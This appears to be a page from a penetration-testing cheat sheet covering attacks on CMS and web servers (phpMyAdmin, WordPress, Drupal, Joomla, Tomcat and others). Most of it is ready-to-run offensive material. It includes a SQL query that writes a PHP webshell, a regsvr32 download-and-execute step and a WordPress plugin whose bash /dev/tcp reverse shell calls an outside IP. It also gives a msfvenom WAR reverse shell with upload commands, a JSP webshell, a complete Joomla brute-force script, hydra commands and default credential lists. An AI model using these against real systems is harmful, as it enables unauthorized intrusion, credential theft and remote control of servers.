CMS

JBOSS/JMX

python jexboss.py -host http://10.10.10.87:80

PHPMyAdmin

PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide 
range of operations on MySQL and MariaDB. Frequently used operations (managing databases, tables, columns, relations, indexes, users, 
permissions, etc) can be performed via the user interface, while you still have the ability to directly execute any SQL statement.

Prepering VM. First we have to change our config file C:\xampp\apache\conf\extra\httpd-xampp.conf and allow to remote user access our 
PHP admin panel. In order to enable it we need to add "allow from 10.0.2.26" and:

<Directory "C:/xampp/">
    AllowOverride AuthConfig Limit
    Order allow,deny
    Allow from all
    Require all granted
</Directory>

After this our server is ready to be compromised.

1. Go to main XAMP page,
2. Go to phpMyAdmin,
3. Create new databse,
4. Execute SQL Query: SELECT "<?php system($_GET[‘cmd’]); ?>" into outfile “C:\\xampp\\htdocs\\backdoor.php” !!Remeber to chane "'" sings
to the new one. Because of different encoding it can cause error.
5. Now we created a new php file in main directory where HTTP resources are stored.
6. Like we can see "http://10.0.2.10/backdoor.php" exist, now we can interact with victim machine.
7. http://10.0.2.10/backdoor.php?cmd=dir will list the content of directory where PHP shell is stored.
8. Now run MSFCONSOLE.
9. We need to USE module exploits/multi/script/web_delivery.rb

IMPORTANT ! exploit/windows/misc/regsvr32_applocker_bypass_server is no longer valid. !

10. During configuration options remeber to change target:

msf exploit(multi/script/web_delivery) > show targets 
Exploit targets:

   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   PSH (Binary)

11. Execute command regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll using our PHP shell. Session is created.

The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system, 
regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the 
specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download 
and execute) can occur on the same port.

Automatic scanners

nikto -h <URL>
python crawleet.py -u <URL> -b -d 3 -e jpg,png,css -f -m -s -x php,txt -y --threads 20

Wordpress

#Enumerate all themes, all users, and all plugins
wpscan --url http://192.168.1.103/wordpress/ -e at -e ap -e u

# Scan
wpscan --rua -e --url <URL>

# Brute force user(s)
wpscan --rua --url <URL> -P <PASSWORDS_LIST> -U "<USER>,<USER>"

# wordpress
wpscan --url http://.... --log
wpscan --url http://... --enumerate u --log
wpscan --url http://<targetip> --wordlist wordlist.txt --username example_username
http://....../wp-admin
http://...../wp-content/uploads/2017/10/file.png

#SSL/TLS
wpscan --disable-tls-checks --url $url

#Enumerate Users
wpscan –url [wordpress url]–enumerate u

#BruteForce User
wpscan –url -u oscar -P /usr/share/wordlist/rockyou.txt
wpscan –url -U creds.txt -P /usr/share/wordlist/rockyou.txt

Wordpress Plugin

#Enumerate all themes, all users, and all plugins
wpscan --url http://192.168.1.103/wordpress/ -e at -e ap -e u

wpscan --url https://192.168.240.148:12380/blogblog/ --plugins-detection passive
wpscan --url https://192.168.240.148:12380/blogblog/ --plugins-detection aggressive


#Vulnerable plugins
wpscan --url https://192.168.240.148:12380/blogblog/ -e vp

#All plugins
wpscan --url https://192.168.240.148:12380/blogblog/ -e ap
wpscan --url http://192.168.1.206:69 -e ap --plugins-detection aggressive

#All themes
wpscan --url https://192.168.240.148:12380/blogblog/ -e at

#Config backups
wpscan --url https://192.168.240.148:12380/blogblog/ -e cb

#Vulnerable themes
wpscan --url https://192.168.240.148:12380/blogblog/ -e vt

Wordpress Manual Enum:

#Plugin Direcory
https://192.168.240.148:12380/blogblog/wp-content/plugins/

#Theme Directory
https://192.168.240.148:12380/blogblog/wp-content/themes/

Wordpress panel RCE

Modifying a php from the theme used (admin credentials needed)

Appearance -> Editor -> 404 Template (at the right)
Change the content for a php shell
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
http://<IP>/wp-content/themes/twentytwelve/404.php

Wordpress WFuzz Plugins

wfuzz -c --hc=404 -w /SecLists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt http://localhost/wp/FUZZ

WordPress NMAP

http-wordpress-brute.nse
http-wordpress-enum.nse

Wordpress panel RCE

Modifying a php from the theme used (admin credentials needed)

Appearance -> Editor -> 404 Template (at the right)
Change the content for a php shell
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
http://<IP>/wp-content/themes/twentytwelve/404.php

Plugin Reverse Shell

sudo rlwrap nc -lnvp 81

<?php

/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.86.99/81 0>&1'");
?>

zip reverse.zip ./reverse.php

Drupal

pip install droopescan
droopescan scan -u <URL>

Username enumeration

In /user/register just try to create a username and if the name is already taken it will be notified :
*The name admin is already taken*

If you request a new password for an existing username :
*Unable to send e-mail. Contact the site administrator if the problem persists.*

If you request a new password for a non-existent username :
*Sorry, test is not recognized as a user name or an e-mail address.*

Accessing /user/<number> you can see the number of existing users :
	- /user/1 -> Access denied (user exist)
	- /user/2 -> Page not found (user doesn't exist)

Hidden pages enumeration

Fuzz /node/<NUMBER> where <NUMBER> is a number (from 1 to 500 for example).
You could find hidden pages (test, dev) which are not referenced by the search engines.

wfuzz -c -z range,1-500 --hc 404 <URL>/node/FUZZ

Drupal panel RCE

You need the plugin php to be installed (check it accessing to /modules/php and if it returns a 403 then, exists, if not found, then the plugin php isn't installed)

Go to Modules -> (Check) PHP Filter  -> Save configuration

https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php

Then click on Add content -> Select Basic Page or Article -> Write php shellcode on the body -> Select PHP code in Text format -> Select Preview

Drupal Brute Force

 ## Drupal bruteforce attack
  #crack the password of admin
site="192.168.230.147"
id=$(curl -s http://$site/user/|grep "form_build_id" |cut -d"\"" -f6)
hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt $site http-form-post "/?q=user/:name=^USER^&pass=^PASS^&form_id=user_login&form_build_id="$id":Sorry" -V

Joomla

joomscan -u <URL>
./joomlavs.rb --url <URL> -a -v

https://github.com/XiphosResearch/exploits/blob/master/Joomraa/joomraa.py

NMAP Joomla

http-joomla-brute.nse

Joomla BruteForce Script

#!/usr/bin/python3
#Example
#python3 joomla-brute.py -u http://192.168.159.79/joomla -w creds -usr admin -v

import requests
from bs4 import BeautifulSoup
import argparse
from urllib.parse import urlparse

class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

class Joomla():

    def __init__(self):
        self.initializeVariables()
        self.sendrequest()

    def initializeVariables(self):
        #Initialize args
        parser = argparse.ArgumentParser(description='Joomla login bruteforce')
        #required
        parser.add_argument('-u', '--url', required=True, type=str, help='Joomla site')
        parser.add_argument('-w', '--wordlist', required=True, type=str, help='Path to wordlist file')

        #optional
        parser.add_argument('-p', '--proxy', type=str, help='Specify proxy. Optional. http://127.0.0.1:8080')
        parser.add_argument('-v', '--verbose', action='store_true', help='Shows output.')
        #these two arguments should not be together
        group = parser.add_mutually_exclusive_group(required=True)
        group.add_argument('-usr', '--username', type=str, help='One single username')
        group.add_argument('-U', '--userlist', type=str, help='Username list')

        args = parser.parse_args()

        #parse args and save proxy
        if args.proxy:
            parsedproxyurl = urlparse(args.proxy)
            self.proxy = { parsedproxyurl[0] : parsedproxyurl[1] }
        else:
            self.proxy=None

        #determine if verbose or not
        if args.verbose:
            self.verbose=True
        else:
            self.verbose=False

        #http:/site/administrator
        self.url = args.url+'/administrator/'
        self.ret = 'aW5kZXgucGhw'
        self.option='com_login'
        self.task='login'
        #Need cookie
        self.cookies = requests.session().get(self.url).cookies.get_dict()
        #Wordlist from args
        self.wordlistfile = args.wordlist
        self.username = args.username
        self.userlist = args.userlist

    def sendrequest(self):
        if self.userlist:
            for user in self.getdata(self.userlist):
                self.username=user.decode('utf-8')
                self.doGET()
        else:
            self.doGET()

    def doGET(self):
        for password in self.getdata(self.wordlistfile):
            #Custom user-agent :)
            headers = {
                'User-Agent': 'nano'
            }

            #First GET for CSSRF
            r = requests.get(self.url, proxies=self.proxy, cookies=self.cookies, headers=headers)
            soup = BeautifulSoup(r.text, 'html.parser')
            longstring = (soup.find_all('input', type='hidden')[-1]).get('name')
            password=password.decode('utf-8')

            data = {
                'username' : self.username,
                'passwd' : password,
                'option' : self.option,
                'task' : self.task,
                'return' : self.ret,
                longstring : 1
            }
            r = requests.post(self.url, data = data, proxies=self.proxy, cookies=self.cookies, headers=headers)
            soup = BeautifulSoup(r.text, 'html.parser')
            response = soup.find('div', {'class': 'alert-message'})
            if response:
                if self.verbose:
                    print(f'{bcolors.FAIL} {self.username}:{password}{bcolors.ENDC}')
            else:
                print(f'{bcolors.OKGREEN} {self.username}:{password}{bcolors.ENDC}')
                break

    @staticmethod
    def getdata(path):
        with open(path, 'rb+') as f:
            data = ([line.rstrip() for line in f])
            f.close()
        return data


joomla = Joomla()

Joomla Authenticated RCE

https://www.hackingarticles.in/joomla-reverse-shell/

Tomcat

Default credentials

The most interesting path of Tomcat is /manager/html, inside that path you can upload and deploy war files (execute code). But  this path is protected by basic HTTP auth, the most common credentials are :

admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat

NMAP

nmap -p8080 --script=tomcat-scan.nse 192.168.54.52

go-tomcat-mgmt-scanner

https://github.com/edermi/go-tomcat-mgmt-scanner

Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -f <IP> http-get /manager/html -vV -u

Tomcat panel RCE

# Generate payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

# Upload payload
Tomcat6 :
wget 'http://<USER>:<PASSWORD>@<IP>:8080/manager/deploy?war=file:shell.war&path=/shell' -O -

Tomcat7 and above :
curl -v -u <USER>:<PASSWORD> -T shell.war 'http://<IP>:8080/manager/text/deploy?path=/shellh&update=true'

# Listener
nc -lvp <PORT>

# Execute payload
curl http://<IP>:8080/shell/

Tomcat-users.xml

usr/share/tomcat9/etc/tomcat-users.xml

:http://megahosting.htb/news.php?file=../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml

Uploading WebShell

script - cmdjsp.jsp

// note that linux = cmd and windows = "cmd.exe /c + cmd" 
//https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/jsp/cmdjsp.jsp

<FORM METHOD=POST ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>

<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd.");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec("cmd");
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) {
            output += s;
         }
      }
      catch(IOException e) {
         e.printStackTrace();
      }
   }
%>

<pre>
<%=output %>
</pre>

Changes to Above Script

-------POST REQUEST is Cleaner-------
#old
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
#new
<FORM METHOD=POST ACTION='cmdjsp.jsp'>


-------change 32 this is because we are going against linux and not windows-------
#old
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); 
#new
Process p = Runtime.getRuntime().exec("cmd);

Uploading with Curl

#create war file because tomcat does not know how to process .jsp
zip cmdjsp.war cmdjsp.jsp

curl -T cmdjsp.war -u 'tomcat:$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/deploy?path=/app

It worked

WebDav

davtest -url <URL>

HTTP brute force authentication

HTTP basic authentication

# Hydra
hydra -l <USER> -V -P <PASSWORDS_LIST> -s 80 -f <IP> http-get /<URL_ENDPOINT>/ -t 15

# Patator
python patator.py http_fuzz auth_type=basic url=<URL> user_pass=FILE0 0=<USER:PASSWORD_LIST> -x ignore:code=401 -x ignore:code=307

HTTP GET request

hydra <IP> -V -l <USER> -P <PASSWORDS_LIST> http-get-form "/login/:username=^USER^&password=^PASS^:F=Error:H=Cookie: safe=yes; PHPSESSID=12345myphpsessid" -t <THREADS_NUMBER>

HTTP POST request

hydra -l <USER> -P <PASSWORDS_LIST> <IP> http-post-form "/webapp/login.php:username=^USER^&password=^PASS^:Invalid" -t <THREADS_NUMBER>

Spidering / Brute force directories / files

gospider -d <DEPTHS> --robots --sitemap -t <THREADS> -s <URL>

ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u <URL>/FUZZ -e .php,.txt -t <THREADS>
dirbuster

Dictionaries :
   - /usr/share/wordlists/dirb/common.txt
   - /usr/share/wordlists/dirb/big.txt
   - /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Jenkins

https://github.com/gquere/pwn_jenkins

PreviousXXE, SQLI, CRLF, CSV,NextLocations

Last updated 4 years ago

Was this helpful?